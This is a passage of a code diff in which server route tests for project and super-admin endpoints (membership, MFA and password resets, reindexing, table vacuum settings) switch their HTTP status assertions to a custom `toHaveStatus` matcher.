+    expect(membersRes).toHaveStatus(200);
     const members = membersRes.body.entry.map((e: any) => e.resource) as ProjectMembership[];
 
     const owner = members.find(
@@ -362,14 +362,14 @@ describe('Project Admin routes', () => {
     const res4 = await request(app)
       .get('/admin/projects/' + project.id + '/members/' + member.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     // Now remove Bob as Alice
     // This should succeed
     const res5 = await request(app)
       .delete('/admin/projects/' + project.id + '/members/' + member.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Get the project details
     // Make sure the new member is an admin
@@ -377,7 +377,7 @@ describe('Project Admin routes', () => {
     const res6 = await request(app)
       .get('/admin/projects/' + project.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body.project).toBeDefined();
 
     // Alice try to delete her own membership
@@ -385,7 +385,7 @@ describe('Project Admin routes', () => {
     const res7 = await request(app)
       .delete('/admin/projects/' + project.id + '/members/' + owner.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res7.status).toBe(400);
+    expect(res7).toHaveStatus(400);
     expect(res7.body).toMatchObject({
       issue: [
         {
@@ -402,7 +402,7 @@ describe('Project Admin routes', () => {
     const res8 = await request(app)
       .delete('/admin/projects/' + project.id + '/members/' + randomUUID())
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res8.status).toBe(404);
+    expect(res8).toHaveStatus(404);
     expect(res8.body).toMatchObject({
       issue: [
         {
@@ -438,13 +438,13 @@ describe('Project Admin routes', () => {
         lastName: 'Patient',
         email: patientEmail,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Get the membership
     const membersRes = await request(app)
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(membersRes.status).toBe(200);
+    expect(membersRes).toHaveStatus(200);
     const members = membersRes.body.entry.map((e: any) => e.resource) as ProjectMembership[];
     const patientMember = members.find(
       (m) => m.profile?.reference?.startsWith('Patient/') && !m.admin
@@ -460,7 +460,7 @@ describe('Project Admin routes', () => {
     const res3 = await request(app)
       .delete('/admin/projects/' + project.id + '/members/' + patientMember.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Verify the User resource was also deleted
     await expect(systemRepo.readResource<User>('User', user.id)).rejects.toThrow();
@@ -490,13 +490,13 @@ describe('Project Admin routes', () => {
         email: practitionerEmail,
         scope: 'server',
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Get the membership
     const membersRes = await request(app)
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(membersRes.status).toBe(200);
+    expect(membersRes).toHaveStatus(200);
     const members = membersRes.body.entry.map((e: any) => e.resource) as ProjectMembership[];
     const practitionerMember = members.find(
       (m) => m.profile?.reference?.startsWith('Practitioner/') && !m.admin
@@ -512,7 +512,7 @@ describe('Project Admin routes', () => {
     const res3 = await request(app)
       .delete('/admin/projects/' + project.id + '/members/' + practitionerMember.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Verify the User resource was NOT deleted (still exists)
     const userAfterDelete = await systemRepo.readResource<User>('User', user.id);
@@ -541,13 +541,13 @@ describe('Project Admin routes', () => {
           valueString: 'test_value',
         },
       ]);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Verify the secret was added
     const res3 = await request(app)
       .get('/admin/projects/' + project.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.project.secret).toHaveLength(1);
     expect(res3.body.project.secret[0].name).toStrictEqual('test_secret');
     expect(res3.body.project.secret[0].valueString).toStrictEqual('test_value');
@@ -557,7 +557,7 @@ describe('Project Admin routes', () => {
       .get('/fhir/R4/Project/' + project.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('X-Medplum', 'extended');
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.meta.author).toMatchObject(createReference(profile));
   });
 
@@ -583,13 +583,13 @@ describe('Project Admin routes', () => {
           domain: ['example.com'],
         },
       ]);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Verify the site was added
     const res3 = await request(app)
       .get('/admin/projects/' + project.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.project.site).toHaveLength(1);
     expect(res3.body.project.site[0].name).toStrictEqual('test_site');
   });
@@ -616,13 +616,13 @@ describe('Project Admin routes', () => {
           valueString: JSON.stringify([{ value: 'gpt-5.5', label: 'GPT-5.5' }]),
         },
       ]);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Verify the setting was added
     const res3 = await request(app)
       .get('/admin/projects/' + project.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.project.setting).toHaveLength(1);
     expect(res3.body.project.setting[0].name).toStrictEqual('aiModels');
     expect(res3.body.project.setting[0].valueString).toStrictEqual(
@@ -648,7 +648,7 @@ describe('Project Admin routes', () => {
         password: 'password123',
       });
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Set password missing password', async () => {
@@ -661,7 +661,7 @@ describe('Project Admin routes', () => {
         password: '',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid password, must be at least 8 characters');
   });
 
@@ -675,7 +675,7 @@ describe('Project Admin routes', () => {
         password: 'password123',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('User not found');
   });
 
@@ -698,7 +698,7 @@ describe('Project Admin routes', () => {
         password: 'password123',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('User not found');
   });
 
@@ -712,7 +712,7 @@ describe('Project Admin routes', () => {
         password: 'new-password!@#',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('User not found');
   });
 
@@ -736,7 +736,7 @@ describe('Project Admin routes', () => {
         password: 'new-password!@#',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Reset MFA - success', async () => {
@@ -760,7 +760,7 @@ describe('Project Admin routes', () => {
         lastName: 'Lee',
         email: `dave${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
 
     // inviteRes.body is the ProjectMembership resource directly
     const membershipId = inviteRes.body.id as string;
@@ -782,7 +782,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(resetRes.status).toBe(200);
+    expect(resetRes).toHaveStatus(200);
 
     // Verify user is no longer enrolled
     const updatedUser = await withTestContext(() => systemRepo.readResource<User>('User', userId));
@@ -811,7 +811,7 @@ describe('Project Admin routes', () => {
         lastName: 'Mills',
         email: `frank${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
 
     const membershipId = inviteRes.body.id as string;
 
@@ -819,7 +819,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(resetRes.status).toBe(400);
+    expect(resetRes).toHaveStatus(400);
     expect(resetRes.body.issue[0].details.text).toBe('User is not enrolled in MFA method: totp');
   });
 
@@ -854,7 +854,7 @@ describe('Project Admin routes', () => {
         lastName: 'Chen',
         email: `ivy${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
 
     const membershipId = inviteRes.body.id as string;
 
@@ -864,7 +864,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${projectA.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + tokenA)
       .send();
-    expect(resetRes.status).toBe(404);
+    expect(resetRes).toHaveStatus(404);
   });
 
   test('Reset MFA - non-admin is rejected', async () => {
@@ -887,7 +887,7 @@ describe('Project Admin routes', () => {
         lastName: 'Page',
         email: `karen${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
 
     const membershipId = inviteRes.body.id as string;
 
@@ -898,7 +898,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + nonAdminUser.accessToken)
       .send();
-    expect(resetRes.status).toBe(403);
+    expect(resetRes).toHaveStatus(403);
   });
 
   test('Reset MFA - invalid method is rejected', async () => {
@@ -921,14 +921,14 @@ describe('Project Admin routes', () => {
         lastName: 'Wong',
         email: `mia${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
     const membershipId = inviteRes.body.id as string;
 
     const resetRes = await request(app)
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ method: 'sms' });
-    expect(resetRes.status).toBe(400);
+    expect(resetRes).toHaveStatus(400);
   });
 
   test('Reset MFA - email method leaves TOTP and secret intact', async () => {
@@ -951,7 +951,7 @@ describe('Project Admin routes', () => {
         lastName: 'Reed',
         email: `omar${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
     const membershipId = inviteRes.body.id as string;
     const userId = (inviteRes.body.user.reference as string).split('/')[1];
 
@@ -972,7 +972,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ method: 'email' });
-    expect(resetRes.status).toBe(200);
+    expect(resetRes).toHaveStatus(200);
 
     const updatedUser = await withTestContext(() => systemRepo.readResource<User>('User', userId));
     // Still enrolled in TOTP
@@ -1002,7 +1002,7 @@ describe('Project Admin routes', () => {
         lastName: 'Ryder',
         email: `quinn${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
     const membershipId = inviteRes.body.id as string;
     const userId = (inviteRes.body.user.reference as string).split('/')[1];
 
@@ -1022,7 +1022,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(resetRes.status).toBe(200);
+    expect(resetRes).toHaveStatus(200);
 
     const updatedUser = await withTestContext(() => systemRepo.readResource<User>('User', userId));
     // Still enrolled via email
@@ -1052,7 +1052,7 @@ describe('Project Admin routes', () => {
         lastName: 'Tan',
         email: `sam${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
     const membershipId = inviteRes.body.id as string;
     const userId = (inviteRes.body.user.reference as string).split('/')[1];
 
@@ -1073,7 +1073,7 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/mfa/reset`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ method: 'email' });
-    expect(resetRes.status).toBe(400);
+    expect(resetRes).toHaveStatus(400);
     expect(resetRes.body.issue[0].details.text).toBe('User is not enrolled in MFA method: email');
   });
 
@@ -1098,14 +1098,14 @@ describe('Project Admin routes', () => {
         email: `uma${randomUUID()}@example.com`,
         sendEmail: false,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
     const membershipId = inviteRes.body.id as string;
 
     const resetRes = await request(app)
       .post(`/admin/projects/${project.id}/members/${membershipId}/resetpassword`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(resetRes.status).toBe(200);
+    expect(resetRes).toHaveStatus(200);
   });
 
   test('Reset password - non-admin is rejected', async () => {
@@ -1128,7 +1128,7 @@ describe('Project Admin routes', () => {
         lastName: 'Xu',
         email: `will${randomUUID()}@example.com`,
       });
-    expect(inviteRes.status).toBe(200);
+    expect(inviteRes).toHaveStatus(200);
     const membershipId = inviteRes.body.id as string;
 
     const nonAdminUser = await withTestContext(() => addTestUser(project));
@@ -1137,6 +1137,6 @@ describe('Project Admin routes', () => {
       .post(`/admin/projects/${project.id}/members/${membershipId}/resetpassword`)
       .set('Authorization', 'Bearer ' + nonAdminUser.accessToken)
       .send();
-    expect(resetRes.status).toBe(403);
+    expect(resetRes).toHaveStatus(403);
   });
 });

--- a/packages/server/src/admin/super.test.ts
+++ b/packages/server/src/admin/super.test.ts
@@ -265,7 +265,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body?.issue?.[0]?.details?.text).toBe('Operation requires "Prefer: respond-async"');
     expect(mockRebuildR4ValueSets).not.toHaveBeenCalled();
   });
@@ -278,7 +278,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     await waitForAsyncJob(res.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
     expect(mockRebuildR4ValueSets).toHaveBeenCalledTimes(1);
@@ -292,7 +292,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(mockRebuildR4ValueSets).not.toHaveBeenCalled();
   });
 
@@ -303,7 +303,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Operation requires "Prefer: respond-async"');
     expect(mockRebuildR4StructureDefinitions).not.toHaveBeenCalled();
   });
@@ -316,7 +316,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     await waitForAsyncJob(res.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
     expect(mockRebuildR4StructureDefinitions).toHaveBeenCalledTimes(1);
@@ -334,7 +334,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     const job = await waitForAsyncJob(res.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
     expect(job.status).toStrictEqual('error');
     expect(mockRebuildR4StructureDefinitions).toHaveBeenCalledTimes(1);
@@ -348,7 +348,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(mockRebuildR4StructureDefinitions).not.toHaveBeenCalled();
   });
 
@@ -359,7 +359,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Operation requires "Prefer: respond-async"');
     expect(mockRebuildR4SearchParameters).not.toHaveBeenCalled();
   });
@@ -372,7 +372,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     await waitForAsyncJob(res.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
     expect(mockRebuildR4SearchParameters).toHaveBeenCalledTimes(1);
@@ -390,7 +390,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     const job = await waitForAsyncJob(res.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
     expect(job.status).toStrictEqual('error');
     expect(mockRebuildR4SearchParameters).toHaveBeenCalledTimes(1);
@@ -404,7 +404,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(mockRebuildR4SearchParameters).not.toHaveBeenCalled();
   });
 
@@ -417,7 +417,7 @@ describe('Super Admin routes', () => {
         resourceType: 'PaymentNotice',
       });
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Reindex require async', async () => {
@@ -429,7 +429,7 @@ describe('Super Admin routes', () => {
         resourceType: 'PaymentNotice',
       });
 
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Operation requires "Prefer: respond-async"');
   });
 
@@ -442,7 +442,7 @@ describe('Super Admin routes', () => {
         resourceType: 'XYZ',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test.each([
@@ -464,7 +464,7 @@ describe('Super Admin routes', () => {
         maxResourceVersion,
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -499,7 +499,7 @@ describe('Super Admin routes', () => {
         maxResourceVersion,
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe(expectedError);
   });
 
@@ -517,7 +517,7 @@ describe('Super Admin routes', () => {
         reindexType: 'outdated',
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -548,7 +548,7 @@ describe('Super Admin routes', () => {
         maxIterationAttempts: 5,
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -578,7 +578,7 @@ describe('Super Admin routes', () => {
         reindexType: 'outdated',
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -610,7 +610,7 @@ describe('Super Admin routes', () => {
         delayBetweenBatches: 1000,
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -658,7 +658,7 @@ describe('Super Admin routes', () => {
         [paramName]: paramValue,
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe(expectedError);
     expect(queue.add).not.toHaveBeenCalled();
   });
@@ -691,7 +691,7 @@ describe('Super Admin routes', () => {
         [paramName]: paramValue,
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -718,7 +718,7 @@ describe('Super Admin routes', () => {
         delayBetweenBatches: 0,
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'ReindexJobData',
@@ -754,7 +754,7 @@ describe('Super Admin routes', () => {
 
       const afterTime = Date.now();
 
-      expect(res.status).toStrictEqual(202);
+      expect(res).toHaveStatus(202);
       expect(res.headers['content-location']).toBeDefined();
 
       // endTimestampBufferMinutes is consumed to calculate endTimestamp, not stored directly
@@ -777,7 +777,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Operation requires "Prefer: respond-async"');
   });
 
@@ -796,7 +796,7 @@ describe('Super Admin routes', () => {
         dryRun: false,
       });
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     expect(queue.add).toHaveBeenCalledWith(
       'LambdaCleanerJob',
@@ -825,7 +825,7 @@ describe('Super Admin routes', () => {
         deleteConcurrency: 0,
       });
 
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(queue.add).not.toHaveBeenCalled();
   });
 
@@ -839,7 +839,7 @@ describe('Super Admin routes', () => {
         password: 'password123',
       });
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Set password missing password', async () => {
@@ -852,7 +852,7 @@ describe('Super Admin routes', () => {
         password: '',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid password, must be at least 8 characters');
   });
 
@@ -866,7 +866,7 @@ describe('Super Admin routes', () => {
         password: 'password123',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('User not found');
   });
 
@@ -892,7 +892,7 @@ describe('Super Admin routes', () => {
         password: 'new-password!@#',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Purge access denied', async () => {
@@ -905,7 +905,7 @@ describe('Super Admin routes', () => {
         before: '2020-01-01',
       });
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Purge invalid resource type', async () => {
@@ -918,7 +918,7 @@ describe('Super Admin routes', () => {
         before: '2020-01-01',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid resource type');
   });
 
@@ -932,7 +932,7 @@ describe('Super Admin routes', () => {
         before: '2020-01-01',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Remove Bot Id from Jobs Queue access denied', async () => {
@@ -944,7 +944,7 @@ describe('Super Admin routes', () => {
         botId: 'testBotId',
       });
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Remove Bot Id from Jobs Queue success', async () => {
@@ -956,7 +956,7 @@ describe('Super Admin routes', () => {
         botId: 'TestBotId',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Remove Bot Id from Jobs Queue missing bot id', async () => {
@@ -968,7 +968,7 @@ describe('Super Admin routes', () => {
         botId: '',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Rebuild projectId as super admin with respond-async', async () => {
@@ -979,7 +979,7 @@ describe('Super Admin routes', () => {
       .type('json')
       .send({});
 
-    expect(res1.status).toStrictEqual(202);
+    expect(res1).toHaveStatus(202);
     expect(res1.headers['content-location']).toBeDefined();
     await waitForAsyncJob(res1.headers['content-location'], app, adminAccessToken);
   });
@@ -994,7 +994,7 @@ describe('Super Admin routes', () => {
         postDeployMigrations: [1, 2, 3],
         pendingPostDeployMigration: 0,
       });
-      expect(res1.status).toStrictEqual(200);
+      expect(res1).toHaveStatus(200);
     });
   });
 
@@ -1008,7 +1008,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: 'Observation', settings: { autovacuum_analyze_scale_factor: 0.005 } });
 
-      expect(res1.status).toStrictEqual(200);
+      expect(res1).toHaveStatus(200);
       expect(res1.body).toMatchObject(allOk);
 
       expect(mockPgMaintenanceQueries).toContain(
@@ -1033,7 +1033,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ settings: { autovacuum_analyze_scale_factor: 0.005 } });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject(badRequest('Table name must be a string'));
 
       expect(infoSpy).not.toHaveBeenCalled();
@@ -1049,7 +1049,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: 'Observation' });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -1085,7 +1085,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: 'Observation', settings: { autovacuum_analyze_scale: 0.005 } });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -1113,7 +1113,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: 'Observation', settings: { autovacuum_analyze_threshold: 0.005 } });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject(badRequest('settings.autovacuum_analyze_threshold must be an integer value'));
 
       expect(infoSpy).not.toHaveBeenCalled();
@@ -1129,7 +1129,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: 'Observation', settings: { autovacuum_analyze_scale_factor: 'testing' } });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject(badRequest('settings.autovacuum_analyze_scale_factor must be a float value'));
 
       expect(infoSpy).not.toHaveBeenCalled();
@@ -1148,7 +1148,7 @@ describe('Super Admin routes', () => {
           settings: { autovacuum_analyze_scale_factor: 0.005, autovacuum_vacuum_scale_factor: 0.01 },
         });
 
-      expect(res1.status).toStrictEqual(200);
+      expect(res1).toHaveStatus(200);
       expect(res1.body).toMatchObject(allOk);
 
       expect(mockPgMaintenanceQueries).toContain(
@@ -1176,7 +1176,7 @@ describe('Super Admin routes', () => {
           settings: { autovacuum_analyze_scale_factor: 0.005, autovacuum_vacuum_scale: 0.01 },
         });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject(badRequest('autovacuum_vacuum_scale is not a valid table setting'));
 
       expect(infoSpy).not.toHaveBeenCalled();
@@ -1194,7 +1194,7 @@ describe('Super Admin routes', () => {
         .set('Prefer', 'respond-async')
         .type('json');
 
-      expect(res1.status).toStrictEqual(202);
+      expect(res1).toHaveStatus(202);
       expect(res1.headers['content-location']).toBeDefined();
       const asyncJob = await waitForAsyncJob(
         res1.headers['content-location'],
@@ -1227,7 +1227,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: 'Observation History', settings: { autovacuum_analyze_scale_factor: 0.005 } });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject(badRequest('Table name must be a snake_cased_string'));
 
       expect(infoSpy).not.toHaveBeenCalled();
@@ -1244,7 +1244,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableNames: ['Observation', 'Observation_History'] });
 
-      expect(res1.status).toStrictEqual(202);
+      expect(res1).toHaveStatus(202);
       expect(res1.headers['content-location']).toBeDefined();
       await waitForAsyncJob(res1.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
 
@@ -1269,7 +1269,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableNames: ['Observation', 'Observation_History'], analyze: true });
 
-      expect(res1.status).toStrictEqual(202);
+      expect(res1).toHaveStatus(202);
       expect(res1.headers['content-location']).toBeDefined();
       await waitForAsyncJob(res1.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
 
@@ -1294,7 +1294,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableNames: ['Observation', 'Observation_History'], analyze: true, vacuum: false });
 
-      expect(res1.status).toStrictEqual(202);
+      expect(res1).toHaveStatus(202);
       expect(res1.headers['content-location']).toBeDefined();
       await waitForAsyncJob(res1.headers['content-location'], app, adminAccessToken, mockAsyncJobWaitOptions);
 
@@ -1317,7 +1317,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableNames: ['Observation', 'Observation_History'], analyze: false, vacuum: false });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
     });
 
     test('Vacuum -- Non-string table names', async () => {
@@ -1330,7 +1330,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableNames: ['Observation', 123] });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.headers['content-location']).not.toBeDefined();
       expect(res1.body).toMatchObject(badRequest('Table name(s) must be a string'));
 
@@ -1348,7 +1348,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableNames: ['Observation', 'Observation History'] });
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.headers['content-location']).not.toBeDefined();
       expect(res1.body).toMatchObject(badRequest('Table name(s) must be a snake_cased_string'));
 
@@ -1366,7 +1366,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ tableName: ['Observation', 123] }); // should be tableNames
 
-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.headers['content-location']).not.toBeDefined();
       expect(res1.body).toMatchObject(badRequest('Unknown field(s)'));
 
@@ -1380,7 +1380,7 @@ describe('Super Admin routes', () => {
         .set('Authorization', 'Bearer ' + adminAccessToken)
         .type('json');
 
